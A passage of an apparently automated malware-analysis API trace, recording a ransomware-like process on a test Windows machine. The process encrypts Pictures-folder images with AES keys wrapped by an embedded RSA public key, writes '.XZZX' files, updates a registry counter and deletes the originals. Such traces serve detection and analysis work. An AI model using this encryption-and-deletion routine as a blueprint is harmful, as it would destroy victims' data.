LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0121.083] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0121.083] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3cc76d0) returned 1 [0121.084] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc76d0, dwCertEncodingType=0x1, pInfo=0x3cb1908*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb1938*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb1940*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3a5590) returned 1 [0121.084] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0121.084] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0121.084] CryptEncrypt (in: hKey=0x3a5590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0121.085] CryptEncrypt (in: hKey=0x3a5590, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc7758*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc7758*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0121.085] WriteFile (in: hFile=0x5a0, lpBuffer=0x3cc7758*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc7758*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0121.085] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0121.085] WriteFile (in: hFile=0x5a0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0121.085] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0121.085] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0121.085] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x5b4) returned 0x0 [0121.085] RegQueryValueExW (in: hKey=0x5b4, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0x7f, lpcbData=0x434dfdc*=0x4) returned 0x0 [0121.085] RegCloseKey (hKey=0x5b4) returned 0x0 [0121.085] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x5b4) returned 0x0 [0121.085] RegSetValueExW (in: hKey=0x5b4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0x80, cbData=0x4 | out: lpData=0x434dfec*=0x80) returned 0x0 [0121.085] RegCloseKey (hKey=0x5b4) returned 0x0 [0121.085] VirtualFree (lpAddress=0x40f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.086] VirtualFree (lpAddress=0x4350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.086] CloseHandle (hObject=0x5a0) returned 1 [0121.087] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0121.087] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0121.087] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0feLIIudH.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\0feliiudh.gif")) returned 1 [0121.125] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0feLIIudH.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\0feliiudh.gif")) returned 0 Thread: id = 391 os_tid = 0x92c [0120.708] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0120.708] lstrcpyW (in: lpString1=0x420f460, lpString2="0uVNLdVwplc802HWrb1.bmp" | out: lpString1="0uVNLdVwplc802HWrb1.bmp") returned="0uVNLdVwplc802HWrb1.bmp" [0120.708] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0120.708] SetErrorMode (uMode=0x1) returned 0x1 [0120.708] lstrcpyW (in: lpString1=0x420f860, lpString2="0uVNLdVwplc802HWrb1.bmp" | out: lpString1="0uVNLdVwplc802HWrb1.bmp") returned="0uVNLdVwplc802HWrb1.bmp" [0120.708] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xa52703f7, Data2=0xb43b, Data3=0x4f18, Data4=([0]=0x94, [1]=0x4d, [2]=0x4f, [3]=0x46, [4]=0x8, [5]=0x7d, [6]=0x9f, [7]=0xed))) returned 0x0 [0120.708] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0uVNLdVwplc802HWrb1.bmp") returned 66 [0120.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0120.708] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7EC795ED37AF1A88A52703F73BCFFED0.XZZX") returned 80 [0120.708] StrStrW (lpFirst="0uVNLdVwplc802HWrb1.bmp", lpSrch="XZZX") returned 0x0 [0120.708] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0uVNLdVwplc802HWrb1.bmp", dwFileAttributes=0x20) returned 1 [0120.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0uVNLdVwplc802HWrb1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\0uvnldvwplc802hwrb1.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x59c [0120.750] ReadFile (in: hFile=0x59c, lpBuffer=0x3ce16b8, nNumberOfBytesToRead=0x90a4, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x3ce16b8*, lpNumberOfBytesRead=0x420e418*=0x90a4, lpOverlapped=0x0) returned 1 [0120.751] CloseHandle (hObject=0x59c) returned 1 [0120.751] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0120.751] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0120.751] SetErrorMode (uMode=0x1) returned 0x1 [0120.751] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0120.752] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc74b0) returned 1 [0120.754] CryptGenKey (in: hProv=0x3cc74b0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5650) returned 1 [0121.033] CryptExportKey (in: hKey=0x3a5650, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0121.033] CryptExportKey (in: hKey=0x3a5650, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0121.033] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0121.033] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0121.033] CryptDestroyKey (hKey=0x3a5650) returned 1 [0121.034] CryptReleaseContext (hProv=0x3cc74b0, dwFlags=0x0) returned 1 [0121.034] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7EC795ED37AF1A88A52703F73BCFFED0.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\7ec795ed37af1a88a52703f73bcffed0.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b0 [0121.034] WriteFile (in: hFile=0x5b0, lpBuffer=0x3ce16b8*, nNumberOfBytesToWrite=0x90a4, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce16b8*, lpNumberOfBytesWritten=0x420e438*=0x90a4, lpOverlapped=0x0) returned 1 [0121.035] SetFilePointer (in: hFile=0x5b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x90a4 [0121.035] WriteFile (in: hFile=0x5b0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0121.035] SetFilePointer (in: hFile=0x5b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x90a9 [0121.035] WriteFile (in: hFile=0x5b0, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x2e, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x2e, lpOverlapped=0x0) returned 1 [0121.035] SetFilePointer (in: hFile=0x5b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x90d7 [0121.036] WriteFile (in: hFile=0x5b0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0121.036] SetFilePointer (in: hFile=0x5b0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x90dc [0121.036] SetErrorMode (uMode=0x1) returned 0x1 [0121.036] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0121.036] OutputDebugStringW (lpOutputString="end") [0121.036] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----vX\x8aÊ\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0121.036] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0121.036] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cc74b0) returned 1 [0121.037] CryptImportPublicKeyInfo (in: hCryptProv=0x3cc74b0, dwCertEncodingType=0x1, pInfo=0x3cb1838*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cb1868*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cb1870*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3a5e10) returned 1 [0121.037] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0121.037] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0121.037] CryptEncrypt (in: hKey=0x3a5e10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0121.037] CryptEncrypt (in: hKey=0x3a5e10, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cc75c0*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cc75c0*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0121.038] WriteFile (in: hFile=0x5b0, lpBuffer=0x3cc75c0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cc75c0*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0121.038] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0121.038] WriteFile (in: hFile=0x5b0, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0121.038] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0121.038] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0121.038] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x5b4) returned 0x0 [0121.038] RegQueryValueExW (in: hKey=0x5b4, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0x7e, lpcbData=0x420dfdc*=0x4) returned 0x0 [0121.038] RegCloseKey (hKey=0x5b4) returned 0x0 [0121.038] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x5b4) returned 0x0 [0121.038] RegSetValueExW (in: hKey=0x5b4, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0x7f, cbData=0x4 | out: lpData=0x420dfec*=0x7f) returned 0x0 [0121.038] RegCloseKey (hKey=0x5b4) returned 0x0 [0121.038] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.039] VirtualFree (lpAddress=0x40e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0121.039] CloseHandle (hObject=0x5b0) returned 1 [0121.040] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0121.041] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0121.041] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0uVNLdVwplc802HWrb1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\0uvnldvwplc802hwrb1.bmp")) returned 1 [0121.042] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\0uVNLdVwplc802HWrb1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\0uvnldvwplc802hwrb1.bmp")) returned 0 Thread: id = 392 os_tid = 0x930 [0120.968] lstrcpyA (in: lpString1=0x449fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0120.968] lstrcpyW (in: lpString1=0x449f460, lpString2="2b2gQ2C3WuJEBl.png" | out: lpString1="2b2gQ2C3WuJEBl.png") returned="2b2gQ2C3WuJEBl.png" [0120.968] lstrcpyW (in: lpString1=0x449e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\" [0120.968] SetErrorMode (uMode=0x1) returned 0x1 [0120.968] lstrcpyW (in: lpString1=0x449f860, lpString2="2b2gQ2C3WuJEBl.png" | out: lpString1="2b2gQ2C3WuJEBl.png") returned="2b2gQ2C3WuJEBl.png" [0120.968] CoCreateGuid (in: pguid=0x449e440 | out: pguid=0x449e440*(Data1=0x512c0edb, Data2=0xc345, Data3=0x42d6, Data4=([0]=0xb5, [1]=0x88, [2]=0x95, [3]=0xa2, [4]=0xff, [5]=0xe7, [6]=0x84, [7]=0x11))) returned 0x0 [0120.968] wsprintfW (in: param_1=0x449ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2b2gQ2C3WuJEBl.png") returned 61 [0120.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x449fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0120.968] wsprintfW (in: param_1=0x449e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7030D20732FB05AE512C0EDB3744E9F6.XZZX") returned 80 [0120.968] StrStrW (lpFirst="2b2gQ2C3WuJEBl.png", lpSrch="XZZX") returned 0x0 [0120.968] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2b2gQ2C3WuJEBl.png", dwFileAttributes=0x20) returned 1 [0121.043] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2b2gQ2C3WuJEBl.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2b2gq2c3wujebl.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5a0 [0121.043] ReadFile (in: hFile=0x5a0, lpBuffer=0x3ce16b8, nNumberOfBytesToRead=0x9da0, lpNumberOfBytesRead=0x449e418, lpOverlapped=0x0 | out: lpBuffer=0x3ce16b8*, lpNumberOfBytesRead=0x449e418*=0x9da0, lpOverlapped=0x0) returned 1 [0121.045] CloseHandle (hObject=0x5a0) returned 1 [0121.045] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0121.045] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0121.046] SetErrorMode (uMode=0x1) returned 0x1 [0121.046] lstrcpyW (in: lpString1=0x449e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0121.046] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cc7538) returned 1 [0121.048] CryptGenKey (in: hProv=0x3cc7538, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3a5650) returned 1 [0121.299] CryptExportKey (in: hKey=0x3a5650, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x449e41c | out: pbData=0x0*, pdwDataLen=0x449e41c*=0x94) returned 1 [0121.299] CryptExportKey (in: hKey=0x3a5650, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x449e41c | out: pbData=0x40a0000*, pdwDataLen=0x449e41c*=0x94) returned 1 [0121.299] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0121.300] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0121.300] CryptDestroyKey (hKey=0x3a5650) returned 1 [0121.300] CryptReleaseContext (hProv=0x3cc7648, dwFlags=0x0) returned 0 [0121.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\7030D20732FB05AE512C0EDB3744E9F6.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\7030d20732fb05ae512c0edb3744e9f6.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5b8 [0121.301] WriteFile (in: hFile=0x5b8, lpBuffer=0x3ce16b8*, nNumberOfBytesToWrite=0x9da0, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x3ce16b8*, lpNumberOfBytesWritten=0x449e438*=0x9da0, lpOverlapped=0x0) returned 1 [0121.302] SetFilePointer (in: hFile=0x5b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9da0 [0121.302] WriteFile (in: hFile=0x5b8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x449e438*=0x5, lpOverlapped=0x0) returned 1 [0121.302] SetFilePointer (in: hFile=0x5b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9da5 [0121.302] WriteFile (in: hFile=0x5b8, lpBuffer=0x449f860*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x449f860*, lpNumberOfBytesWritten=0x449e438*=0x24, lpOverlapped=0x0) returned 1 [0121.302] SetFilePointer (in: hFile=0x5b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9dc9 [0121.302] WriteFile (in: hFile=0x5b8, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x449e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x449e438*=0x5, lpOverlapped=0x0) returned 1 [0121.302] SetFilePointer (in: hFile=0x5b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9dce [0121.302] SetErrorMode (uMode=0x1) returned 0x1 [0121.302] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV 